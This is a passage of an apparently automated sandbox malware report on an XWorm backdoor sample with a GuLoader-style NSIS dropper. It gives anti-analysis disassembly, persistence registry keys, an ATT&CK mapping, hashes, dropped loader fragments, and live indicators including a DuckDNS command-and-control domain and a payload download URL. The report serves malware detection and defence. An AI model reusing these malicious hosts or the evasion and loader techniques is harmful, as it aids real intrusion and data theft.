      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\H33UCslPzv.exeAPI/Special instruction interceptor: Address: 66EAC97
      Source: C:\Users\user\Desktop\H33UCslPzv.exeAPI/Special instruction interceptor: Address: 33AAC97
      Source: C:\Users\user\Desktop\H33UCslPzv.exeRDTSC instruction interceptor: First address: 6691A8F second address: 6691A8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 mov edi, 000000A9h 0x00000008 cmp edi, 5F7C1BECh 0x0000000e jnl 00007F2380DD9C9Ah 0x00000014 pop edi 0x00000015 test dh, bh 0x00000017 cmp ebx, ecx 0x00000019 jc 00007F2380D7F190h 0x0000001b test bx, dx 0x0000001e inc ebp 0x0000001f inc ebx 0x00000020 test eax, eax 0x00000022 rdtsc
      Source: C:\Users\user\Desktop\H33UCslPzv.exeRDTSC instruction interceptor: First address: 3351A8F second address: 3351A8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 mov edi, 000000A9h 0x00000008 cmp edi, 5F7C1BECh 0x0000000e jnl 00007F2380CC938Ah 0x00000014 pop edi 0x00000015 test dh, bh 0x00000017 cmp ebx, ecx 0x00000019 jc 00007F2380C6E880h 0x0000001b test bx, dx 0x0000001e inc ebp 0x0000001f inc ebx 0x00000020 test eax, eax 0x00000022 rdtsc
      Source: C:\Users\user\Desktop\H33UCslPzv.exeMemory allocated: D0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeMemory allocated: 35980000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeMemory allocated: 37980000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeWindow / User API: threadDelayed 7687Jump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeWindow / User API: threadDelayed 2078Jump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\H33UCslPzv.exeAPI coverage: 1.8 %
      Source: C:\Users\user\Desktop\H33UCslPzv.exe TID: 5780Thread sleep count: 33 > 30Jump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exe TID: 5780Thread sleep time: -30437127721620741s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exe TID: 2072Thread sleep count: 7687 > 30Jump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exe TID: 2072Thread sleep count: 2078 > 30Jump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exe TID: 5780Thread sleep count: 31 > 30Jump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_004062F0 FindFirstFileA,FindClose,0_2_004062F0
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004057B5
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_00402765 FindFirstFileA,5_2_00402765
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_004062F0 FindFirstFileA,FindClose,5_2_004062F0
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 5_2_004057B5 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004057B5
      Source: C:\Users\user\Desktop\H33UCslPzv.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: H33UCslPzv.exe, 00000005.00000002.2726386871.00000000055E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
      Source: C:\Users\user\Desktop\H33UCslPzv.exeAPI call chain: ExitProcess graph end nodegraph_0-4200
      Source: C:\Users\user\Desktop\H33UCslPzv.exeAPI call chain: ExitProcess graph end nodegraph_0-4192
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_70021A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70021A98
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeProcess created: C:\Users\user\Desktop\H33UCslPzv.exe "C:\Users\user\Desktop\H33UCslPzv.exe"Jump to behavior
      Source: H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359D8000.00000004.00000800.00020000.00000000.sdmp, H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
      Source: H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359D8000.00000004.00000800.00020000.00000000.sdmp, H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
      Source: H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359D8000.00000004.00000800.00020000.00000000.sdmp, H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359D8000.00000004.00000800.00020000.00000000.sdmp, H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
      Source: H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359D8000.00000004.00000800.00020000.00000000.sdmp, H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
      Source: C:\Users\user\Desktop\H33UCslPzv.exeQueries volume information: C:\Users\user\Desktop\H33UCslPzv.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\H33UCslPzv.exeCode function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403248
      Source: C:\Users\user\Desktop\H33UCslPzv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: H33UCslPzv.exe, 00000005.00000002.2726386871.00000000055E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Users\user\Desktop\H33UCslPzv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: H33UCslPzv.exe PID: 5968, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: H33UCslPzv.exe PID: 5968, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      Registry Run Keys / Startup Folder
      1
      Access Token Manipulation
      11
      Masquerading
      OS Credential Dumping321
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      1
      DLL Side-Loading
      12
      Process Injection
      1
      Disable or Modify Tools
      LSASS Memory1
      Process Discovery
      Remote Desktop Protocol1
      Clipboard Data
      1
      Non-Standard Port
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Registry Run Keys / Startup Folder
      31
      Virtualization/Sandbox Evasion
      Security Account Manager31
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading
      1
      Access Token Manipulation
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
      Process Injection
      LSA Secrets2
      File and Directory Discovery
      SSHKeylogging23
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Deobfuscate/Decode Files or Information
      Cached Domain Credentials215
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
      Obfuscated Files or Information
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      H33UCslPzv.exe50%ReversingLabsWin32.Backdoor.Xworm
      H33UCslPzv.exe63%VirustotalBrowse
      H33UCslPzv.exe100%AviraTR/AD.NsisInject.oovyn
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif100%AviraTR/AD.NsisInject.oovyn
      C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif50%ReversingLabsWin32.Backdoor.Xworm
      C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
      http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      apslline.com
      103.53.40.62
      truefalse
        unknown
        xwor3july.duckdns.org
        12.221.146.138
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://apslline.com/LfGiMdRCMSvlQHkIpf170.binfalse
            unknown
            xwor3july.duckdns.orgtrue
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://apslline.com/F/&H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005627000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://nsis.sf.net/NSIS_ErrorH33UCslPzv.exe, Thereagainst198.pif.5.drfalse
                • URL Reputation: safe
                unknown
                http://nsis.sf.net/NSIS_ErrorErrorH33UCslPzv.exe, Thereagainst198.pif.5.drfalse
                • URL Reputation: safe
                unknown
                https://apslline.com/A/9H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005627000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameH33UCslPzv.exe, 00000005.00000002.2750831860.00000000359B0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  103.53.40.62
                  apslline.comIndia
                  394695PUBLIC-DOMAIN-REGISTRYUSfalse
                  12.221.146.138
                  xwor3july.duckdns.orgUnited States
                  7018ATT-INTERNET4UStrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1542720
                  Start date and time:2024-10-26 08:42:17 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 42s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:H33UCslPzv.exe
                  renamed because original name is a hash value
                  Original Sample Name:462c6c970323f0e94eecb835032d8e993fca9ee0c6f944f656dfebde036479ed.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@3/28@10/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 95%
                  • Number of executed functions: 65
                  • Number of non-executed functions: 68
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  02:44:34API Interceptor295x Sleep call for process: H33UCslPzv.exe modified
                  07:44:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Extra10 C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif
                  07:44:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Extra10 C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  103.53.40.62sgJV11UlDP.exeGet hashmaliciousGuLoader, XWormBrowse
                    c56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                      https://go.skimresources.com/?id=129857X1500501&url=https://www.freelansssssssssssssssscer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/45834840-3c14-4374-8f51-bbcadebab762?j=eyJ1IjoiNGRnZ2x2In0Get hashmaliciousHTMLPhisherBrowse
                        12.221.146.138LtTo3qijh2.exeGet hashmaliciousXWormBrowse
                          sgJV11UlDP.exeGet hashmaliciousGuLoader, XWormBrowse
                            c56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                              17230659061f7212c82a51474b4881c633df451e130ec6cfbd94355d94352086b239967195549.dat-decoded.exeGet hashmaliciousPureLog StealerBrowse
                                17178602463c6b4cdf436b48ec4c5dbc6aee5ae0da7ee001e248c7e98692d8d99ecd71b334854.dat-decoded.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                  Paymentxx212093.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                    17178602463c6b4cdf436b48ec4c5dbc6aee5ae0da7ee001e248c7e98692d8d99ecd71b334854.dat-decoded.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                      Paymentxx212093.vbsGet hashmaliciousXWormBrowse
                                        hvnmaynew.exeGet hashmaliciousPureLog StealerBrowse
                                          hvnmaynew.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            xwor3july.duckdns.orgLtTo3qijh2.exeGet hashmaliciousXWormBrowse
                                            • 12.221.146.138
                                            sgJV11UlDP.exeGet hashmaliciousGuLoader, XWormBrowse
                                            • 12.221.146.138
                                            c56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                                            • 12.221.146.138
                                            apslline.comsgJV11UlDP.exeGet hashmaliciousGuLoader, XWormBrowse
                                            • 103.53.40.62
                                            c56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                                            • 103.53.40.62
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ATT-INTERNET4USLtTo3qijh2.exeGet hashmaliciousXWormBrowse
                                            • 12.221.146.138
                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                            • 63.201.237.131
                                            la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                            • 67.114.221.64
                                            la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                            • 172.175.149.47
                                            la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                            • 23.121.67.54
                                            la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                            • 13.157.246.41
                                            la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                            • 99.44.38.75
                                            la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                            • 69.230.186.175
                                            la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                            • 71.135.132.136
                                            la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                            • 172.143.111.207
                                            PUBLIC-DOMAIN-REGISTRYUSPILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                            • 199.79.62.19
                                            https://landsmith.ae/continue.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 103.53.42.223
                                            PO# 4507573387.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                            • 199.79.62.115
                                            PO #89230.exeGet hashmaliciousAgentTeslaBrowse
                                            • 207.174.215.249
                                            SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 208.91.199.223
                                            FZCO - PO#12345.exeGet hashmaliciousAgentTeslaBrowse
                                            • 207.174.215.249
                                            TT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                            • 119.18.54.27
                                            PO-000041522.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 199.79.62.115
                                            MA2402201136.exeGet hashmaliciousAgentTeslaBrowse
                                            • 199.79.62.115
                                            Shipment.exeGet hashmaliciousAgentTeslaBrowse
                                            • 207.174.215.249
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            37f463bf4616ecd445d4a1937da06e19factura Fvsae2400398241025.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 103.53.40.62
                                            SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exeGet hashmaliciousUnknownBrowse
                                            • 103.53.40.62
                                            BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                            • 103.53.40.62
                                            Rampage.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                            • 103.53.40.62
                                            v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                            • 103.53.40.62
                                            Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                            • 103.53.40.62
                                            sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                            • 103.53.40.62
                                            VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                            • 103.53.40.62
                                            RFQ_24196MR_PDF.vbsGet hashmaliciousGuLoaderBrowse
                                            • 103.53.40.62
                                            https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0Y7M4M4N1J5K4K6Y6N5R4&c=E,1,OlGTQS9-XwC2vBMWr7I6ylXZJam5iCAEz8vCZAxOsyVrFii_1IhqZZqiTz_dLP-ondxd1F0_mQoffiXjC_RNTQQ_48xVwrK55zuEfYrxqUa2Wr6UOEIpqcM,&typo=1Get hashmaliciousUnknownBrowse
                                            • 103.53.40.62
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dllsgJV11UlDP.exeGet hashmaliciousGuLoader, XWormBrowse
                                              c56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                https://downloadsnew.garaninapps.com/SRTMiniServer_2.4.3_2024-02-26_INSTALL.exeGet hashmaliciousUnknownBrowse
                                                  5006_2.6.2.exeGet hashmaliciousUnknownBrowse
                                                    ocs-office.exeGet hashmaliciousUnknownBrowse
                                                      jU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        jU0hAXFL0k.exeGet hashmaliciousGuLoaderBrowse
                                                          #U4e5d#U6708#U58f0#U660e_40981677.xlsGet hashmaliciousGuLoaderBrowse
                                                            MaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              MaMsKRmgXZ.exeGet hashmaliciousGuLoaderBrowse
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Category:dropped
                                                                Size (bytes):3212629
                                                                Entropy (8bit):7.954369753521349
                                                                Encrypted:false
                                                                SSDEEP:98304:EH5hTCwpsZGol4OU0HTVHzyCj+7BN72vBqx/Yapu5koUX:A20Rol4Sz1H+7j2JiFpu5kPX
                                                                MD5:9ECAE0D26219DDB2355AD7B597887760
                                                                SHA1:3946B3AD9B7233BDDA8053C2410D796BDC9FA21D
                                                                SHA-256:462C6C970323F0E94EECB835032D8E993FCA9EE0C6F944F656DFEBDE036479ED
                                                                SHA-512:728A4282EED54BEF2B75E61EF26104A81F036D89D474ABF49DB406260178D319480A505B1AAC324CAA92D93D3D2383FF69D064367C1F88BAC16611FD21276BD1
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@........./.........r.../..............+......Rich...........PE..L......].................b....9.....H2............@...........................?...........@.................................0........`;.x............................................................................................................text....`.......b.................. ..`.rdata..>............f..............@..@.data...X.9..........z..............@....ndata... ...@:..........................rsrc...x....`;......~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.441667212304602
                                                                Encrypted:false
                                                                SSDEEP:3:sEMBQEJkJVEjDF7VJimxQoXUn:GVJimxvUn
                                                                MD5:1DA505643EAC073F4677751E8EB03E73
                                                                SHA1:94A9A883DCE8CE8332369F51DCF316F74D747659
                                                                SHA-256:C7D506524D0BB4E1D083F5556DA506EA08A535906AED5CF1F5DF461104E087CE
                                                                SHA-512:3B5F71E89F9B9EB5FEE66273770EC2D907ECC0FBF912DFA67AFEE88EC9C9804806556A91409337B8B8A00D4B32D6E1A7597979F4C869254387B60713B9BB34E4
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:kernel32::VirtualAlloc(i 0,i 58839040, i 0x3000, i 0x40)p.r1
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):56
                                                                Entropy (8bit):4.228669708547486
                                                                Encrypted:false
                                                                SSDEEP:3:sAAEVvjsqb7VJ8VL84n:fLlVJ8P
                                                                MD5:4FA88BBEE4C8AEA1ECA565750B019480
                                                                SHA1:EF36BA5B8BB8C3C8E99D51C74034E28482FF60B8
                                                                SHA-256:247F8AE8C1A5CE9D7D7F80ED5F08D0DD42F0706CF1DBFD9BA2E7F0B4EECC85D0
                                                                SHA-512:B6FB444DF47B8F11BA13CD5DF82A33E9DDA9223FCD91D827C580960AC3CCD576DD84F53B850D465D60B93E6443017148132686F0EA5656121CF6802DDCAD434D
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:kernel32::ReadFile(i r5, i r1, i 58839040,*i 0, i 0)i.r3
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):30
                                                                Entropy (8bit):4.256564762130954
                                                                Encrypted:false
                                                                SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                                MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                                SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                                                SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                                SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:user32::EnumWindows(i r1 ,i 0)
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):74
